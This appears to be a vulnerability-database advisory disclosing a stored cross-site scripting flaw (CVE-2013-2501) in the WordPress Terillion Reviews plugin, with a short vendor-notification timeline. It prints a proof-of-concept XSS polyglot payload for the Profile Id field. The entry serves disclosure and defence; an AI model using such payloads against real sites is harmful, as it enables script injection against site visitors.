Lucene search
Aditya BalapurePACKETSTORM:120730HistoryMar 09, 2013 - 12:00 a.m.
WordPress Terillion Reviews Cross Site Scripting
2013-03-0900:00:00
Aditya Balapure
packetstormsecurity.com
19
0.073 Low
EPSS
Percentile
93.4%
`CVE Assigned-CVE-2013-2501
#############################
Exploit Title : Stored XSS in Terillion Reviews Plugin
Author: Aditya Balapure
home: http://adityabalapure.blogspot.in/
Date: 08/03/13
Software link:
http://wordpress.org/extend/plugins/terillion-reviews/
#############################
The Terillion Reviews Plugin in Wordpress http://wordpress.org/extend/plugins/terillion-reviews/ has a Stored XSS Vulnerability in the Profile Id input box.
PoC Script Used
Script Used-
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
Vendor Notification
20/02/2013 - Vendor notified awaiting action
07/03/2013 - Removed from the Wordpress Repository
`
Related
cve
cve
CVE-2013-2501
2013-03-22 21:55:00
securityvulns
securityvulns
Stored XSS in Terillion Reviews Wordpress Plugin
2013-03-11 00:00:00
prion
prion
Cross site scripting
2013-03-22 21:55:00
wpvulndb
wpvulndb
Terillion Reviews < 1.2 - Profile Id Field XSS
2014-08-01 10:58:58
patchstack
patchstack
WordPress Terillion Reviews Plugin <= 1.1 - XSS
2013-03-07 00:00:00